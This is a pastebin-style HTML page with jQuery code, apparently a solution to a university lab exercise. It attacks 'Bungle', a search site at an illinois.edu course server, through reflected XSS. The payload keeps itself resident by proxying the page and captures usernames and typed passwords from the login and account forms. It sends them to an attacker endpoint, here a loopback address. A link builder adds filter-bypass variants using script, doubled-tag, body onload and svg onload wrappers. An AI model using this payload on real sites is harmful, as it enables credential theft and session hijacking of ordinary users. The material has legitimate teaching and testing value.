
Untitled

a guest
Nov 29th, 2017
  1. <meta charset="utf-8">
  2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
  3. <script>
  /*
   * payload(attacker) -- script body that makeLink() serialises with
   * payload.toString() and places in the q parameter of the target's search
   * page. Because the function's source text is what gets emitted, this
   * description sits above the function rather than inside it.
   *
   * Parameter:
   *   attacker  base URL that receives the reports; log() appends "?" plus
   *             $.param(data).
   *
   * What the visible code does once it runs in the target page:
   *   - hides the document, then proxy("./") loads the target's own page into
   *     the html element and shows it again, so this code stays resident while
   *     the page looks unchanged;
   *   - proxy(href) sets the address bar with history.pushState, re-proxies on
   *     popstate, and after every load rebinds the click handlers for
   *     #bungle-lnk, #search-again-btn, #search-btn, .history-item,
   *     #log-in-btn, #new-account-btn and #log-out-btn;
   *   - each handler cancels the default action, reports the event through
   *     log(), then performs the real request itself (login, create, logout)
   *     or navigates via proxy();
   *   - log() writes the report to the console and issues a GET through
   *     spy_get(). Reports carry event "nav", "login" or "logout"; "login"
   *     reports include the username and the password typed into #username
   *     and #userpass, and logCreateAccount() reuses the "login" event name;
   *   - getUser() returns the text of #logged-in-user, or null when the
   *     element is absent.
   *
   * spy_get() sets timeout: 1 (jQuery timeouts are in milliseconds) and has
   * no callbacks -- presumably fire-and-forget, the response is never read.
   *
   * Defender notes: the observable side effects are GET requests from the
   * target's pages to a foreign host with event=, user=, pass= and url=
   * query parameters, and search URLs whose q value contains markup. The
   * fix belongs in the target: encode q for the HTML context where it is
   * echoed, and use a Content-Security-Policy that rejects inline script and
   * restricts connect-src. All target URLs here are http://, so the posted
   * credentials also travel in cleartext.
   */
  function payload(attacker) {
    var target = "http://trurl.cs.illinois.edu/";
    function spy_get(spy_url) {
      $.ajax({
        url: spy_url,
        type: "GET",
        timeout: 1
      });
    }

    function log(data) {
      console.log(attacker + "?" + $.param(data));
      spy_get(attacker + "?" + $.param(data));
    }

    function log_nav(dest) {
      if (getUser() == null) {
        log({event: "nav", url: target + dest});
      } else {
        log({event: "nav", user: getUser(), url: target + dest});
      }
    }

    function logLogout() {
      log({event: "logout", user: getUser()});
      log({event: "nav", url: target});
    }

    function logLogin(username, password) {
      log({event: "login", user: username, pass: password});
      log({event: "nav", user: username, url: target});
    }

    function logCreateAccount(username, password) {
      log({event: "login", user: username, pass: password});
      log({event: "nav", user: username, url: target});
    }

    function getUser() {
      var username;
      if ($("#logged-in-user").length != 0) {
        username = $("#logged-in-user").text();
      } else {
        username = null;
      }
      return username;
    }

    function proxy(href) {
      history.pushState(null, null, href);

      $(window).on("popstate", function(e) {
        e.preventDefault();
        proxy("." + location.pathname + window.location.search);
      });

      $("html").load(href, function(){
        $("html").show();

        $("#bungle-lnk, #search-again-btn").click(function(e) {
          e.preventDefault();
          log_nav("");
          proxy("./");
        });

        $("#search-btn").click(function(e) {
          e.preventDefault();
          var search = $("#query").val();
          log_nav("search?q=" + search);
          proxy("./search?q=" + search);
        });

        $(".history-item").click(function(e) {
          var url = $(this).attr("href");
          e.preventDefault();
          log_nav(url);
          proxy(url);
        });

        $("#log-in-btn").click(function(e) {
          e.preventDefault();
          var username = $("#username").val();
          var userpass = $("#userpass").val();
          logLogin(username, userpass);
          $.ajax({
            type: "POST",
            url: "http://trurl.cs.illinois.edu/login",
            dataType: "text",
            data: {
              username: username,
              password: userpass
            },
            success: function() {
              proxy("./");
            }
          });
        });

        $("#new-account-btn").click(function(e) {
          e.preventDefault();
          var username = $("#username").val();
          var userpass = $("#userpass").val();
          logCreateAccount(username, userpass);
          $.ajax({
            type: "POST",
            url: "http://trurl.cs.illinois.edu/create",
            dataType: "text",
            data: {
              username: username,
              password: userpass
            },
            success: function() {
              logLogin(username, userpass);
              $.ajax({
                type: "POST",
                url: "http://trurl.cs.illinois.edu/login",
                dataType: "text",
                data: {
                  username: username,
                  password: userpass
                },
                success: function(){
                  proxy("./");
                }
              });
            }
          });
        });

        $("#log-out-btn").click(function(e) {
          e.preventDefault();
          logLogout();
          $.ajax({
            type: "POST",
            url: "http://trurl.cs.illinois.edu/logout",
            success: function(){
              proxy("./");
            }
          });
        });
      });
    }
    $("html").hide();
    proxy("./");
  }
  149.  
  /**
   * Build the search URL used to exercise one of the target's XSS defence
   * levels.
   *
   * The URL is always target + "./search?xssdefense=<level>&q=<encoded markup>".
   * Levels 0-3 place payload's source text, followed by a call that passes the
   * attacker URL, inside a different piece of markup each; level 4 carries only
   * an empty script element and no payload.
   *
   * The variants differ only in the wrapper (script element, doubled
   * "scrscriptipt" spelling, body onload, svg onload). The server-side filters
   * are not shown here; the variants appear to answer pattern-removal filters,
   * which is why the durable fix is output encoding of q rather than more
   * patterns.
   *
   * @param {number} xssdefense - defence level; compared loosely against 0..4.
   * @param {string} target - base URL of the site under test.
   * @param {string} attacker - URL handed to payload() in levels 0-3.
   * @returns {string|undefined} the link, or undefined for any other level.
   */
  function makeLink(xssdefense, target, attacker) {
    // One builder per level, indexed by level. Builders are thunks so that
    // payload is only touched for the level actually selected. Tag names stay
    // split across string pieces so this source can live inside a script block.
    var markupByLevel = [
      function () {
        return "<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/script>";
      },
      function () {
        return "<scrscriptipt" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<" + "/scrscriptipt>";
      },
      function () {
        return "<body onload='" + payload.toString() + "; payload(\"" + attacker + "\"); '>";
      },
      function () {
        return "<svg/onload='" + payload.toString() + "; payload(\"" + attacker + "\"); '>";
      },
      function () {
        return "<script" + "><" + "/script>";
      }
    ];

    // Loose equality is intentional: it mirrors the level checks 0, 1, 2, 3, 4
    // in that order, so "4" and 4 select the same variant.
    for (var level = 0; level < markupByLevel.length; level++) {
      if (xssdefense == level) {
        return target + "./search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent(markupByLevel[level]());
      }
    }
    // No matching level: fall through and return undefined.
  }
  163.  
  // Defence level used for the generated link; level 4 is the variant that
  // carries an empty script element and no payload.
  var xssdefense = 4;
  // Site whose search page receives the q parameter.
  var target = "http://trurl.cs.illinois.edu/";
  // Collection endpoint handed to payload(); a loopback address (127.0.0.1).
  var attacker = "http://127.0.0.1:31337/stolen";

  // Once the DOM is ready, render the generated URL as a link inside the h3.
  $(document).ready(function () {
    var link = makeLink(xssdefense, target, attacker);
    var anchorHtml = "<a target=\"run\" href=\"" + link + "\">Try Bungle!</a>";
    $("h3").html(anchorHtml);
  });
  172. </script>
  173.  
  174. <h3></h3>